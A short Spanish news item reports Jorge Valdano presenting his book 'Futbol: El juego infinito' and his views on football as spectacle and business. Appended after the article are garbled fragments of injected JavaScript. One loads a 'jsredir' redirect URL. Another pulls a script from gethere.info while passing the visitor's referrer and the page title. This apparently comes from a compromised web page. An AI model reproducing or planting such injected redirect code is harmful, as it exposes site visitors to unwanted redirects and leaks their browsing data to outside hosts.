Jorge Valdano presenta su nuevo libro “Futbol: El juego infinito”

El exfutbolista argentino presentó su más reciente libro Futbol: El juego infinito en el que califica al futbol como un deporte emocionante, que sin embargo, no tiene corazón.

El escritor destacó que el futbol aun es tan popular por su capacidad de adaptarse a la globalización a pesar de tratarse de un juego, en apariencia, tan primitivo.

“El futbol ha estado por encima de la radio, la televisión, las redes sociales y los fenómenos de internet que estén por venir” declaró Valdano.

En su libro, Valdano detalla a todos los actores que han hecho del futbol un espectáculo mediático, y describe como este deporte ha cambiado en su esencia y ha transformado el papel de los entrenadores y jugadores hasta convertirlos en los nuevos héroes. Además, trata la temática del futbol más como negocio que como deporte y la transformación de aficionados en clientes.

El libro ya está a la venta y es una excelente opción si eres amante del futbol, además del placer que representa leer al llamado “filósofo del futbol”.

 

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;